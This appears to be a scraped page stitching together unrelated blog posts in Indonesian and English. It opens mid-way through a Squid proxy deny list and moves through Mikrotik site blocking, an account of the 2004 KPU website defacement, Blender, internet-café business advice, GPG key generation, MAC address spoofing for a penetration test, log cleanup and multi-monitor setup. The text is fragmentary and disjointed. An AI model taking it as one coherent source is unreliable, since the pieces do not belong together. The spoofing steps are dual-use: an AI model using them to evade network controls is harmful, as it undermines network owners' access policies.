acl dom_audio-video dstdomain "
acl dom_gambling dstdomain "
acl dom_proxy dstdomain "
acl dom_warez dstdomain "

http_access deny sex
http_access deny adult
http_access deny aggressive
http_access deny drugs
http_access deny porn
http_access deny ads
http_access deny audio-video
http_access deny gambling
http_access deny warezhttp_access deny dom_adult
http_access deny dom_aggressive
http_access deny dom_drugs
http_access deny dom_porn
http_access deny dom_violence
http_access deny dom_ads
http_access deny dom_audio-video
http_access deny dom_gambling
http_access deny dom_proxy
http_access deny dom_warez

Dengan cara di atas, saya tidak hanya memblokir situs porno tapi juga situs yang berkaitan dengan drug, kekerasan, perjudian dll. Semua data ada pada file blacklist dari www.squidguard.org.


Block Situs di Mikrotik Lewat Winbox

1.Buka winbox yang berada pada desktop.

2. Klik tando ( … ) atau isi alamat Mikrotik pada kolom Connect To:

3. Maka akan muncul gambar seperti di bawah ini, kemudian pilih salah satu.

4. Setelah itu isi Username dan Passwort Mikrotik

5. Kemudian klik tanda connect.

6. Dan akan terbuka jendela Mikrotik seoerti gambar di bawah ini.

7. Untuk block situs klik menu IP pilih Web Proxy

8. Kemudian Setting Web Proxy dengan mengeklik tombol Setting.

9. Maka akan muncul jendela seperti gambar di bawah ini.
Setting Web Proxy sepeti gambar di bawah ini, kemudian di klik tombol OK.

10. Sekarang kita mulai buat settingan website yang akan di block.Klik tanda ( + )
Maka akan muncul jendela, dan kemudia setting seperti gambar di bawah ini.

11. Kemudian klik OK, maka akan muncul catatan pada jendela Web Proxy.

12. Coba cek settingan tersebut dengan mengetikan kata “porno” pada google.

13. Dan kemudian enter, jika muncul tampilan seperti gambar di bawah ini maka settingan block situs Kamu berhasil.

Diposkan oleh Diandra Ariesalva Blogs di 10:39 0 komentar

Kejahatan dunia maya (Inggris: cybercrime) adalah istilah yang mengacu kepada aktivitas kejahatan dengan komputer atau jaringan komputer menjadi alat, sasaran atau tempat terjadinya kejahatan. Termasuk ke dalam kejahatan dunia maya antara lain adalah penipuan lelang secara online, pemalsuan cek, penipuan kartu kredit/carding, confidence fraud, penipuan identitas, pornografi anak, dll.

Walaupun kejahatan dunia maya atau cybercrime umumnya mengacu kepada aktivitas kejahatan dengan komputer atau jaringan komputer sebagai unsur utamanya, istilah ini juga digunakan untuk kegiatan kejahatan tradisional di mana komputer atau jaringan komputer digunakan untuk mempermudah atau memungkinkan kejahatan itu terjadi.

Contoh kejahatan dunia maya di mana komputer sebagai alat adalah spamming dan kejahatan terhadap hak cipta dan kekayaan intelektual. Contoh kejahatan dunia maya di mana komputer sebagai sasarannya adalah akses ilegal (mengelabui kontrol akses), malware dan serangan DoS. Contoh kejahatan dunia maya di mana komputer sebagai tempatnya adalah penipuan identitas. Sedangkan contoh kejahatan tradisional dengan komputer sebagai alatnya adalah pornografi anak dan judi online.


Pada pemilu 2004 lalu, ada sebuah kasus yang cukup mengegerkan dan memukul telak KPU sebagai institusi penyelenggara Pemilu. Tepatnya pada 17 April 2004 situs KPU diacak-acak oleh seseorang dimana nama-nama partai peserta pemilu diganti menjadi lucu-lucu namun data perolehan suara tidak dirubah. Pelaku pembobolan situs KPU ini dilakukan oleh seorang pemuda berumur 25 tahun bernama Dani Firmansyah, seorang mahasiswa Universitas Muhammadiyah Yogyakarta jurusan Hubungan Internasional.

Pihak Kepolisian pada awalnya kesulitan untuk melacak keberadaan pelaku terlebih kasus seperti ini adalah barang baru bagi Kepolisian. Pada awal penyelidikan Polisi sempat terkecoh karena pelaku membelokan alamat internet atau internet protocol (IP address) ke Thailand namun dengan usaha yang gigih, polisi berhasil meringkus tersangka ini setelah bekerjasama dengan beberapa pihak seperti Asosiasi Penyelenggara jasa Internet Indonesia (APJII) dan pihak penyedia jasa koneksi internet (ISP/Internet Service Provider).

Belakangan diketahui motif tersangka adalah untuk menunjukkan bahwa kinerja KPU sangat buruk terutama di bidang Teknologi Informasi, namun itu tidak bisa dibenarkan dan pelaku tetap diproses sesuai hukum yang berlaku.

          ANIMASI 3D        

Membuat 3D dengan Blender 3D
Membuat 3D dengan Blender 3D
Pusatgratis – Untuk semua pengunjung PG yang tertarik di dunia 3D modelling dan animasi.. Blender 3D adalah software gratis yang bisa anda gunakan untuk modeling, texuring, lighting, animasi dan video post processing 3 dimensi. Blender 3D yang merupakan software gratis dan open source ini merupakan open source 3D paling populer di dunia. Fitur Blender 3D tidak kalah dengan software 3D berharga mahal seperti 3D studio max, maya maupun XSI.
Dengan Blender 3D anda bisa membuat objek 3D animasi, media 3D interaktif, model dan bentuk 3D profesional, membuat objek game dan masih banyak lagi kreasi 3D lainnya.
Blender 3D memberikan fitur – fitur utama sebagai berikut :
1. interface yang user friendly dan tertata rapi.
2. tool untuk membuat objek 3D yang lengkap meliputi modeling, UV mapping, texturing, rigging, skinning, animasi, particle dan simulasi lainnya, scripting, rendering, compositing, post production dan game creation.
3. Cross Platform, dengan uniform GUI dan mendukung semua platform. Blender 3D bisa anda gunakan untuk semua versi windows, Linux, OS X, FreeBSD, Irix, Sun dan sistem operasi yang lainnya.
4. Kualitas arsitektur 3D yang berkualitas tinggi dan bisa dikerjakan dengan lebih cepat dan efisien.
5. Dukungan yang aktif melalui forum dan komunitas
6. File Berukuran kecil
7. dan tentu saja gratis
Berikut ini beberapa screenshot gambar dan animasi 3 dimensi hasil desain dari Blender 3D
Gambar Hasil Desain Blender 3D
Gambar Hasil Desain Blender 3D
Gambar hasil Desain Blender 3D
Gambar hasil Desain Blender 3D
Gambar Hasil Desain Blender 3D
Gambar Hasil Desain Blender 3D
Gambar Hasil Desain Blender 3D
Gambar Hasil Desain Blender 3D
Gambar hasil Desain Blender 3D
Gambar hasil Desain Blender 3D
Hasil desain 3D oleh freeware Open Source Blender 3D terbukti tidak kalah dengan software 3D yang berharga mahal happy
Download Blender 3D dari situs resmi Blender 3D | License : Free, open Source | size : 13 – 24 Mb (tergantung sistem operasi anda) | Support : Semua versi Windows, Linux, OS X, FreeBSD, Irix, Sun dan beberapa sistem operasi yang lainnya.
Selamat mendesain

Stop Dreaming start Action (Mau mencoba dan berkarya)

Kata-kata stop dreaming start action mempengaruhi pikiranku, mungkin kita banyak bermimpi atau berkayal untuk mendapatkan sesuatu, mungkin cita-cita bisa selangkit harapan dan keinginan bisa tinggi setinggi gunung. Tapi apakah semua itu kita dapatkan yang kita harapakan tentu tidak karena masih ada tidakan yang harus kita lakukan, itu yang membuat kita susah untuk mendapatkan yang kita inginkan.
Perlu kita ingan didunia ini apa sih yang kita dapatkan dari bermimpi? mukin belum ada didunia ini orang yang kaya atau sukses hanya dengan duduk-duduk, tidur-tiduran atau bermalas -malasan, mungkin ada tapi hanya sedikit yang kita temukan atau bisa dibilang kaya dari warisan,atau terlahir dari anak orang kaya bisa juga suskse dari keberuntungan. Mimpinya orang film sinetron.
Saya banyak mendapatkan kiriman email dari Bapak Joko susilo yang banyak memberi masukan dan motivasi ilmu tentang hal kesuksesan, itu yang mempengaruhi pikiranku sekarang. Mungkin klop aja dari dunia ilmu yang saya geluti yaitu komputer terutama dibidang internet, banyak hal yang saya terima dari kiraman emailnya.yaitu tentang slogan blog harus mempunyai slogan penting. Jadi slogan saya di blog adalah tentang membuat animasi flash. Dimana saya dituntut untuk lebih bayak berkreatifitas dalam berkarya, ada juga email yang dikirimkan kepada saya tentang 6 cara menumbuhkan kreativitas. Saya sangat berterima kasih kepada bapak Joko susilo, walaupun karya saya tidak bagus tapi itu membuat saya berarti karena keinginan saya sejak kecil terwujud sekarang.
Kreativitas yang saya buat hanya untuk menyalurkan hobie, tapi setidaknya saya tidak bermimpi untuk bisa melakukannya walaupun saya tidak pintar menggambar. ungkin rekan - rekan semua bisa sama seperti saya mungkin ada bisa memwujudkan imipin anda walupun hanya sesaat. Hidup selalu penuh pengorbanan dan perjuangan dan kita pasti mendapatkan kemulian dari usahanya.

          Mau Membuat Warung Internet Sendiri?        

Teknologi Warung Internet harus di akui merupakan teknologi andalan dalam memberikan alternatif akses Internet yang murah bagi banyak orang. Secara umum ada dua (2) hal utama yang perlu diperhatikan dalam membangun Warung Internet, yaitu (1) sisi bisnis / manajemen WARNET dan (2) sisi teknologi WARNET. Saya sangat sarankan untuk ikut secara aktif monitoring mailing list yang berkaitan dengan per-warnet-an di Internet, seperti asosiasi-warnet@yahoogroups.com, asosiasi-warnet-broadband@yahoogroups.com, asosiasiwarnetbandung@yahoogroups.com, kowaba@yahoogroups.com dsb. Maupun berbagai mailing list yang berkaitan dengan teknologi informasi, seperti it-center@yahoogroups.com, linux-setup@linux.or.id, linux-admin@linux.or.id dsb.

Dari sisi bisnis / manajemen WARNET, isu yang ada biasanya berkisar masalah Marketing, Promosi, Usaha Memperoleh Pelanggan, Jangan pernah berkonsentrasi pada teknis karena pada akhirnya sense bisnis menjadi faktor penentu keberhasilan pendapatan anda.

Isu utama yang biasanya menjadi kunci adalah bisnis plan sebuah WARNET, sebagian besar orang sangat gamang karena belum / tidak mempunyai patokan yang pasti tentang bisnis plan WARNET. Sebetulnya saya sudah pernah membuatkan bisnis plan WARNET dalam bentuk file Excel yang dapat di ubah-ubah angka-nya di sesuaikan dengan kondisi di lapangan. File bisnis plan tersebut maupun berbagai informasi tentang WARNET bisa di ambil secara cuma-cuma di http://www.detik.com/net/kolom-warnet/ dan http://www.bogor.net/idkf/fisik/warung-internet/. Komponen dalam bisnis plan tidak banyak sebetulnya, yaitu (1) investasi yang biasanya sekitar Rp. 4 juta-an / PC, (2) biaya operasional yang biasanya akan banyak di habiskan dengan membayar Telkom & ISP selain membayar pegawai, listrik dsb. dan (3) tarif.

Bagi anda yang bisa menghayati usaha WARNET maka sebetulnya sense bisnis-nya sederhana sekali, yaitu:

·         Letakan WARNET di tempat yang banyak orang, terutama orang muda.
·         Semakin banyak komputer yang digunakan, semakin murah tarif, semakin cepat balik modal.
·         Batas minimal komputer yang feasible untuk akses Web sekitar 5 komputer jika menggunakan sambungan telepon dial-up.

Khusus untuk WARNET di sekolah-sekolah / di universitas yang kecil, ada beberapa tip sederhana yang perlu diperhatikan juga, yaitu:

·         Kalau bisa siswa membayar langsung dari SPP.
·         Melibatkan siswa dalam pengelolaan WARNET supaya ada rasa memiliki diantara siswa selain membantu siswa belajar teknologi lebih dalam.
·         Tutup akses Web & chatting, gunakan e-mail sebagai media komunikasi utama di Internet. Biasanya sekolah tidak sadar bahwa akses Web akan menghabiskan pulsa paling banyak & paling mahal untuk membayar Telkom.

Sebagai gambaran umum, untuk sekolah dengan siswa 700 orang, sebagai gambaran umum biaya yang perlu di keluarkan adalah sekitar Rp. 40 juta-an untuk fasilitas WARNET dengan 10 buah komputer. Kelihatannya mahal, padahal tidak sama sekali. Biaya akses e-mail per bulan yang perlu dikeluarkan untuk Telkom & ISP sekitar Rp. 500.000. Akses Web & Chatting sengaja di tutup jika kepala sekolah, guru & yayasan tidak yakin bahwa siswa mampu menjaga diri-nya melakukan surfing di Internet untuk tidak masuk ke situs yang tidak baik.

Modal akan kembali dalam waktu kurang dari satu tahun, jika setiap siswa bersedia untuk membayar tambahan SPP Rp. 3000 / bulan / siswa. Sebuah investasi yang kecil & kemungkinan kembali yang pasti. Di samping itu, biaya Rp. 3000 / siswa / bulan sebetulnya termasuk sedikit sekali, praktis cukup dapat dipenuhi dengan ceria oleh para siswa. Mohon diperhatikan bahwa untuk Rp. 3000 / bulan / siswa ini para siswa hanya dapat menikmati fasilitas e-mail di Interet. Sedangkan Web harus membayar tambahan sekitar Rp. 3500-5000 / jam seperti WARNET biasa, atau jika operator WARNET cukup kreatif, dapat juga sebagian Web di akses melalui CD-ROM lokal. Selanjutnya jika sudah lebih dari satu tahun & sudah balik modal, keuntungan yang diperoleh bisa terus dikembangkan untuk membeli komputer tambahan untuk fasilitas akses Internet agar lebih baik & mudah bagi para siswa.

Dari sisi teknologi Warung Internet, ada beberapa isu besar yang perlu diperhatikan. Secara umum topologi sederhana sebuah WARNET konvensional tampak pada gambar. WARNET terdiri dari sebuah Local Area Network (LAN) yang tersambung ke Internet melalui sebuah gateway yang kadang-kadang juga berfungsi sebagai server. Pada tingkat yang lebih kompleks, konsep ini dapat dikembangkan dengan mudah untuk menyambungkan jaringan di kompleks perumahan (untuk membuat RT/RW-net), di kompleks pertokoan, kompleks perkantoran, di sekolah-sekolah, di kampus-kampus yang pada akhirnya memungkinkan orang Indonesia untuk akses ke Internet dengan biaya yang sangat murah.

Teknik Local Area Network (LAN) relatif cukup mapan, biasanya WARNET menggunakan topologi Bus dengan ethernet 100BaseT yang murah di pasaran pada kecepatan 100Mbps di LAN. Ethernet Card yang baik bisa diperoleh sekitar Rp. 150.000 / card sebaiknya jangan membeli yang murah sekali (sekitar Rp. 70.000-an) karena biasanya jelek. Pada Kampus Network, Kompleks Perumahan, Kompleks Perkantoran tentunya teknik yang digunakan semakin kompleks.

Sambungan jarak jauh dari WARNET ke ISP maupun ke Internet internasional mempunyai variasi yang cukup banyak. Teknik yang paling murah adalah menggunakan dial-up melalui kabel telepon milik Telkom ke ISP lokal. Teknik sederhana ini persis sama dengan pola yang kita pakai untuk akses internet di rumah-rumah. Kecepatan maksimum di Indonesia umumnya sekitar 33.6Kbps karena jaringan Telkom yang ada kualitasnya tidak baik. Biaya akses per bulan yang dikeluarkan bagi WARNET yang cukup aktif menggunakan saluran dial-up ini adalah sekitar Rp. 2.5 juta / bulan dengan kecepatan akses 33.6Kbps yang akhirnya membatasi jumlah komputer yang bisa akses beramai-ramai sekitar 7-10 komputer saja.

Bagi sebagian WARNET, kompleks perkantoran, kompleks perumahan yang lebih maju umumnya mereka tidak lagi menggunakan Telkom karena selain kualitas jaringannnya kurang baik, kecepatan akses-nya juga lambat yang semua mengurangi profit WARNET. Teman-teman yang lebih maju ini umumnya menggunakan peralatan microwave buatan sendiri di frekuensi 2.4GHz, beberapa bereksperimen juga di frekuensi 5.8GHz yang terakhir ada beberapa rekan yang juga mencoba menggunakan gelombang cahaya infra merah di antara beberapa gedung di Jakarta. Kecepatan pengiriman dapat menggunakan peralatan microwave / cahaya infra merah ini cukup menakjubkan sekitar 2-11Mbps yang jauh lebih tinggi dibandingkan Telkom. Jika di paksakan menggunakan gelombang infra merah dapat mencapai kecepatan 155Mbps.

Rekan-rekan WARNET di Bandung, saat ini cukup nekad karena membangun sendiri stasiun bumi untuk akses ke Internet secara langsung pada kecepatan 1Mbps yang kemudian di distribusikan menggunakan microwave di 2.4GHz pada kecepatan 11Mbps. Seluruh infrastruktur menjadi beban biaya sekitar beberapa puluh WARNET sekitar Rp. 4-5.5 juta / bulan / WARNET. Cukup murah mengingat kecepatan yang bisa di capai adalah 1Mbps ke Internet dan 11Mbps antar WARNET.

Pada kesempatan lain akan saya coba jelaskan lagi lebih detail teknologi Warung Internet tersebut. Saya sarankan kalau bisa aktif di berbagai mailing list WARNET maupun mengambil informasi tentang WARNET di http://www.bogor.net/idkf yang gratisan.

          How to Sell Linux        
Sell- Verb (used with object)- to persuade or induce (someone) to buy or use something That’s one of the many definitions of the word sell, it is also the definition which allowed me to use the word in this context. This post is all about how we (as a community of Linux users) could persuade […]
          New Page- My Videos        
I’ve created a new page called My Videos, it will be a mix of my favourite videos and the ones I create: all of which will be about tutorials based on Windows, Mac and Linux as well as online stuff.
          Lamp, Mamp and Wamp        
LAMP is an acronym of Linux Apache, MySQL and PHP. MAMP is an acronym of Mac Apache, MySQL and PHP. And as expected WAMP is an acronym of Windows Apache, MySQL and PHP. They are a download which packages together Apache, MySQL and PHP and allow you to build and host websites locally. It is […]
          Ubuntu 10.04- Mac?        
Over the past couple of weeks since Ubuntu 10.04 was released and I, along with all the other users, have been discovering how much like Mac OSX it is becoming. I solely mean the interface, like the buttons moving to the left and all that jazz. Another feature which, while trawling through my long list […]
          How to Make Awesome Wallpapers in GIMP        
GIMP is my image editor/creator of choice on both Windows and Linux however I prefer Photoshop on Mac. If you have any experience of Photoshop you will know how to use these tools, brushes and effects in it. GIMP as I have reviewed before in both ‘5 Lightweight Alternatives to Popular Applications‘ and in ‘Top […]
          5 Lightweight Alternatives to Popular Applications        
Okay so if you have been reading my blog regularly you will have noticed that I love free, open source software, which in many cases is an alternative to popular, expensive and worst of all closed-source software. Here is my list of 5 Lightweight Alternatives to Popular Applications (with a brief introduction and explanation of […]
          Some Awesome Gaming        
Now Mac and Linux are often criticized for the lack of good games available under the two platforms compared to Windows. Perhaps Mac is moving in the right direction towards native big budget games however, Linux is not. We may have WINE ,which is something I will do a feature on, but it doesn't replace the real game.
          5 Browsers You’ve Never Heard Of        
Over the past few years many different browsers have been created and become very popular for example Mozilla Firefox and Google Chrome, however, there are many browsers which are generally unheard of among the majority of web users. Here are 5 of them
          Top 5 Free Windows Applications        
Here is my view on what are the top 10 free Windows Apps are. All the apps websites are linked in the name. Also I have left out software such as browsers as I will be doing a later focus on that.
          5 Great Firefox Addons        
Firefox is one of the great open-source projects around and with the Mozilla Foundation behind it. It has a huge community of developers all creating add-ons for Firefox, Thunderbird and Seammonkey. Firefox has a great selection of add-ons available from Shopping to Social Networking or from Blogging to Download Management Firefox has an add-on for it.
          Comment on Goldengate 12c Troubleshooting Using LogDump Utility by JayaKishore        
Hi I have doubt. Installed goldengate 11 in my server and when i do HELP it is not giving. [oracle@ip-172-31-22-99 gg_11g2]$ pwd /u01/app/oracle/oradata/orcl/product/gg_11g2 [oracle@ip-172-31-22-99 gg_11g2]$ ./ggsci Oracle GoldenGate Command Interpreter for Oracle Version 17888650 OGGCORE_11. Linux, x64, 64bit (optimized), Oracle 11g on Dec 16 2013 03:43:25 Copyright (C) 1995, 2013, Oracle and/or its affiliates. All rights reserved. GGSCI (ip-172-31-22-99) 1> help No help available. why?
          Consola de Ubuntu en Windows 10        

Siempre he pensado que lo que realmente le hace falta a Windows para ser una completa herramienta de desarrollo es una consola poderosa como la de Linux, de hecho, esa es la razón por la que uso Mac OS, un Continuar leyendo

La entrada Consola de Ubuntu en Windows 10 se publicó primero en Juarbo.

          KLM implementeert private cloud         
KLM had al een volwassen IT-omgeving, die op Linux na volledig was gevirtualiseerd. De implementatie van een private cloud is de volgende stap in het groeimodel. “We hebben gekozen voor de technologie van Microsoft omdat die ons in staat stelt om meerdere OS-sen in één cloud onder te brengen. Zo blijven we maximaal flexibel.” Een gesprek met Timor Slamet en Irma van der Kroef. In de zomer van 2011 vatte Timor Slamet het plan op om stap voor stap de ICT van KLM onder te brengen in een private cloud. Slamet is als technical director bij KLM IT Operations verantwoordelijk voor de architectuur en engineering van de IT-infrastructuur.
          Vrije Universiteit Amsterdam bespaart € 185.000 door af te zien van een investering in storage en creëert tegelijkertijd meer opslagcapaciteit met Exchange Server 2010         
Enkele jaren geleden rolde de VU voor haar studenten een communicatieplatform uit op basis van Cyrus IMAP op een Linux server. Daarmee groeide de capaciteit van de mailboxen van de studenten naar 300 MB. "Toch was dat voor de studenten niet voldoende. Bovendien mist Cyrus een aantal elementaire functies, zoals een agenda, en vonden de studenten de interface niet gebruiksvriendelijk. Persoonlijk vind ik deze mailomgeving meer een oplossing voor techneuten, terwijl het merendeel van onze studenten gewoon gebruiker is. Zij beschikken over allerlei mobiele apparaten en computers en willen een oplossing waarmee ze op al die apparaten met niet teveel moeite hun mail en agenda kunnen bereiken. Met Cyrus konden we daar niet eenvoudig aan voldoen,” zegt Chris Slijkhuis. De medewerkers en 21.000 studenten van de VU kunnen sinds de invoering van Exchange Server 2010 op elk willekeurig apparaat hun mail en agenda bereiken en hun agenda's delen met collega's en medestudenten. Bovendien hebben ze nu allemaal een grotere mailbox en noteert de VU een forse kostenbesparing. De universiteit had € 185.000,= gereserveerd voor investering in hardware. Chris Slijkhuis: “Deze investering was nodig voor Exchange Server 2007 en betrof € 35.000,= voor extra 'blade servers' en ten minste € 150.000,= voor SAS-opslagapparatuur. Door de inzet van Exchange Server 2010 in plaats van versie 2007 hoefden we deze investering niet te doen. We hebben dus € 185.000,= bespaard, terwijl de mailboxcapaciteit voor de studenten met maar liefst 67 procent is toegenomen!” Eind volgend jaar zal de migratie naar Exchange Server 2010 voor de gehele VU zijn voltooid. De universiteit is van plan om in die periode ook Unified Messaging in de communicatie-omgeving te implementeren, ondersteund door Microsoft Office Communications Server 2007.  Daarmee zullen de gebruikers over een uniforme IN-box kunnen beschikken voor zowel e-mail en voicemail als instant messaging (IM).
          Multi Instruments verbetert infrastructuur met Windows Small Business Server én bespaart op licentiekosten         
Tot begin vorig jaar had Multi Instruments voor haar communicatie een web- en mailoplossing in gebruik, die bij een externe provider op een Linux server draaide. Jack van Dalen, financieel directeur van Multi Instruments: "We hadden steeds vaker problemen met het mailverkeer. De Linux-server was regelmatig uit de lucht, bijlagen waren niet te openen, gebruikers moesten zelf hun mailboxen opschonen, anders liep het mailverkeer vast enzovoort." Om de nieuwe infrastructuur vorm te geven wendde Multi Instruments zich begin vorig jaar tot Microsoft Certified Partner Tredion Automatisering. Tredion directeur Jan van Wijgerden: "Multi Instruments wilde een server, die het bedrijf zelf in beheer kon houden en die van alles moest kunnen. Allereerst moest hij dienen als fileserver, hij moest alle moderne communicatievoorzieningen bieden, volledige integratie van mail, contacten, agenda en (laptop)mobiliteit en dat alles moest naadloos aansluiten bij Microsoft Dynamics  NAV. Als je zoveel functionaliteit wilt, kom je al snel uit bij Microsoft Windows Small Business Server 2008 Premium.”  Windows Small Business Server 2008 is een suite van seerverpakketten, waaronder de nieuwste versies van Windows Server, Exchange Server en SQL Server. Van Dalen: “In vergelijking met de oude Linux-oplossing hebben we met Exchange Server een betrouwbare, schaalbare en beheerbare oplossing voor communicatie. Zowel extern als intern, want tegen lage exploitatiekosten wisselen we nu 24 uur per dag berichten en bestanden uit. Zo’n dertig gebruikers, van wie tien in de buitendienst, maken gebruik van het nieuwe platform.” Over de schaalbaarheid van Windows Small Business Server zegt Jan van Wijgerden: "Deze oplossing biedt ruimte om door te groeien naar 75 gebruikers". Een ander voordeel is het licentievoordeel. Multi Instruments beschikte reeds over een Microsoft SQL Server-licentie, onder andere voor de salarisadministratie en het Exact-boekhoudpakket. Omdat SQL Server een standaardonderdeel is van Windows Small Business Server 2008 Premium, kon deze licentie vervallen, wat de TCO gunstig beïnvloedt. Overigens is het Exact-pakket niet meer in gebruik. Van Dalen: “Begin dit (boek)jaar draaien we qua ERP volledig op Microsoft Dynamics NAV. Exact gebruiken we alleen nog voor het raadplegen van de administratie van voorgaande boekjaren." De integratie van Dynamics NAV met de communicatievoorzieningen is gerealiseerd via Microsoft Outlook. Van Dalen: "De koppeling met Outlook biedt enorm veel mogelijkheden. Onze medewerkers kunnen bijvoorbeeld een mailingcampagne aansturen en deze sturen naar de relaties van wie de gegevens in Dynamics staan. Ook kunnen ze taken en notities vastleggen bij deze klantgegevens. Alle offertes worden nu via e-mail verstuurd!"
          Red Hat Enterprise Linux gets cozy with MongoDB        
Easing the path for organizations to launch big data-styled services, Red Hat has coupled the 10gen MongoDB data store to its new identity management package for the Red Hat Enterprise Linux (RHEL) distribution.
          How to Generate GPG Public / Private Key Pair (RSA / DSA / ElGamal)?        
Written by Pranshu Bajpai |  | LinkedIn

This post is meant to simplify the procedure for generating GNUPG keys on a Linux machine. In the example below, I am generating a 4096 bit RSA public private key pair.

Step 1. Initiate the generation process

#gpg --gen-key
 This initiates the generation process. You have to answer some questions to configure the needed key size and your details. For example, select from several kinds of keys available. If you do not know which one you need, the default 1 will do fine.

I usually select my key size to be 4096 bits which is quite strong. You can do the same or select a lower bit size. Next, select an expiration date for your key -- I chose 'never'.

Step 2. Generate entropy

The program needs entropy, also known as randomness, to generate the keys. For this you need to type on the keyboard or move the mouse pointer or use disk. However, you may still have to wait a while before the keys are generated.

For this reason, I use rng-tools to generate randomness. First install 'rng-tools' by typing:
#apt-get install rng-tools
Run the tool: 
#rngd -r /dev/urandom
The process of finding entropy should now conclude faster. On my system, it was almost instantaneous.

Step 3. Check ~/.gnupg to locate the keys

Once the keys are generated, they are usually stored in ~/.gnupg, a hidden gnupg directory in the home folder. You can check the location of keys by typing:

#gpg -k
The key fingerprint can be obtained by:
   #gpg --fingerprint

Step 4. Export the public key to be shared with others

For others to be able to communicate with you, you need to share you public key. So move to the ~/.gnupg folder and export the public key:

#gpg --armor --export email@host.com > pub_key.asc
'ls' should now show you a new file in the folder called 'pub_key.asc'. 'cat' will show you that this is the public key file.

Important !

Needless to say, do not share your private key with anyone.
          [MACchanger] Spoofed MAC address changes back to original permanent MAC before connecting to WiFi        
Written by Pranshu Bajpai |  | LinkedIn

So I needed to spoof my machine's MAC / hardware address as part of a routine penetration test. One problem that I keep facing when using Kali Linux utility, 'macchanger', to do this is that the MAC does successfully spoof but changes back to the original MAC address right before I attempt to connect to a wireless access point. Good thing that years of working in security / hacking has made me paranoid enough to constantly check if the new spoofed MAC address is being used. 'ifconfig' in terminal tells me that it is not. Instead, right before connecting to the wireless access point my machine went back to it's original MAC address on 'wlan0'. Not good.

Solution to retain the spoofed MAC address on wlan0 in Kali Linux:

I've discovered that these 3 commands will help:

ifconfig wlan0 down
ifconfig wlan0 hw ether 00:11:22:33:44:55
ifconfig wlan0 up

Additionally, you may have to turn your WiFi off / on using the graphic panel in the top right. But now, you can connect to the wireless access point and then 'ifconfig wlan0' should reveal that your machine is using the spoofed MAC address: 00:11:22:33:44:55 as shown in image below.

          /var/log Disk Space Issues | Ubuntu, Kali, Debian Linux | /var/log Fills Up Fast        
Written by Pranshu Bajpai |  | LinkedIn

Recently, I started noticing that my computer keeps running out of space for no reason at all. I mean I didn't download any large files and my root drive should not be having any space issues, and yet my computer kept tellling me that I had '0' bytes available or free on my /root/ drive. As I found it hard to believe, I invoked the 'df' command (for disk space usage):

So clearly, 100% of the disk partition is in use, and '0' is available to me. Again, I tried to see if the system simply ran out of 'inodes' to assign to new files; this could happen if there are a lot of small files of '0' bytes or so on your machine.
#df -i

Only 11% inodes were in use, so this was clearly not a problem of running out of inodes. This was completely baffling. First thing to do was to locate the cause of the problem. Computers never lie. If the machine tells me that I am running out of space on the root drive then there must be some files that I do not know about, mostly likely these are some 'system' files created during routine operations.

To locate the cause of the problem, I executed the following command to find all files of size greater than ~2GB:
# find / -size +2000M

Clearly, the folder '/var/log' needs my attention. Seems like some kernel log files are humongous in size and have not been 'rotated' (explained later). So, I listed the contents of this directory arranged in order of decreasing size:
#ls -s -S

That one log file 'messages.1' was 12 GB in size and the next two were 5.5 GB. So this is what has been eating up my space. First thing I did, was run 'logrotate':
It ran for a while as it rotated the logs. logrotate is meant to automate the task of administrating log files on systems that generate a heavy amount of logs. It is responsible for compressing, rotating, and delivering log files. Read more about it here.

What I hoped by running logrotate was that it would rotate and compress the old log files so I can quickly remove those from my system. Why didn't I just delete that '/var/log' directory directly? Because that would break things. '/var/log' is needed by the system and the system expects to see it. Deleting it is a bad idea. So, I needed to ensure that I don't delete anything of significance.

After a while, logrotate completed execution and I was able to see some '.gz' compresses files in this directory. I quickly removed (or deleted) these.

Still, there were two files of around 5 GB: messages.1 and kern.log.1.  Since these had already been rotated, I figured it would be safe to remove these as well. But instead of doing an 'rm' to remove them, I decided to just empty them (in case they were being used somewhere).
#> messages.1
#> kern.log.1

The size of both of these was reduced to '0' bytes. Great! Freed up a lot of disk space this way and nothing 'broken' in the process.

How did the log files become so large over such a small time period?

This is killing me. Normally, log files should not reach this kind of sizes if logrotate is doing its job properly or if everything is running right. I am still interested in knowing how did the log files got so huge in the first place. It is probably some service, application or process creating a lot of errors maybe? Maybe logrotate is not able to execute under 'cron' jobs? I don't know. Before 'emptying' these log files I did take a look inside them to find repetitive patterns. But then I quickly gave up on reading 5 GB files as I was short on time.

Since this is my personal laptop that I shut down at night, as opposed to a server that is up all the time, I have installed 'anacron' and will set 'logrotate' to run under 'anacron' instead of cron. I did this since I have my suspicions that cron is not executing logrotate daily. We will see what the results are.

I will update this post when I have discovered the root cause of this problem.
          Multiple Screens in (Kali) Linux | How To        
Written by Pranshu Bajpai |  | LinkedIn

I have felt the need for multiple screens several times simply because of the many tabs and terminal windows I keep open on my box. Hence, to avoid constantly switching between these, I decided to bring in multiple screens . You might have felt the same--especially if you work on multiple applications simultaneously. Some people use these multiple screens while playing games as well.

Before I brought in new screens, I wanted to get a 'feel' of using them, and decide whether this is something I would be comfortable with while working. Fortunately, I had an old LG 17'' CRT monitor lying around which I used for testing this set up of multiple screens. Here, the operating system I am using is Kali Linux (Debian 7 wheezy) but the process is fairly straightforward and would work for any Linux (or Windows) box.

How to set up multiple screen on (Kali) Linux

Firstly, you need to make the hardware connection, that is, connect the other screen's display cable to your machine. In my case, I connected the old CRT monitor's VGA cable to my HP laptop.

You need to locate the 'Display' panel to set up the initial configuration. This should not be hard to do. On a Debian or Kali Linux box, this would be under 'Applications' --> 'System Tools' --> 'Preferences' --> 'System Settings' --> 'Displays'

The location of 'Displays' could vary according to your Linux distro, however, again, it should not be hard to locate. Once inside, you will see that your OS has detected the two displays. Uncheck 'Mirror displays'. By default, your laptop's screen is the primary display and would be on the left. You can drag and change this so that the laptop's display is on the right--as I have done here.

How to set the primary display screen

By default, your laptop's screen is your primary display. This means that the top panel, containing 'Applications' and 'Places', and the bottom panel, tracking open windows and tabs, would be available on the laptop's screen only. I wanted to change this so that my CRT monitor's screen was the primary screen. To do so, I edited the monitors.xml file in Linux.

Locate 'monitors.xml' in '/home/.config/monitors.xml' or '/root/.config/monitors.xml'. Now, edit it in a text editor so that you modify the line containing '<primary>yes/no</primary>'.

In my case, I have modified the xml file so that the part corresponding to my laptop's screen says  '<primary>no</primary>', and the part corresponding to the CRT monitor says '<primary>yes</primary>'.

Now, the CRT monitor is the primary screen and the 'Applications', 'Places' etc would show up here. After all the set up, this is what it looks like on my box:

Note that this is the extended display corresponding to both the screens, that is, half of this shows up on one screen and half on the other. This is a picture of my set up:

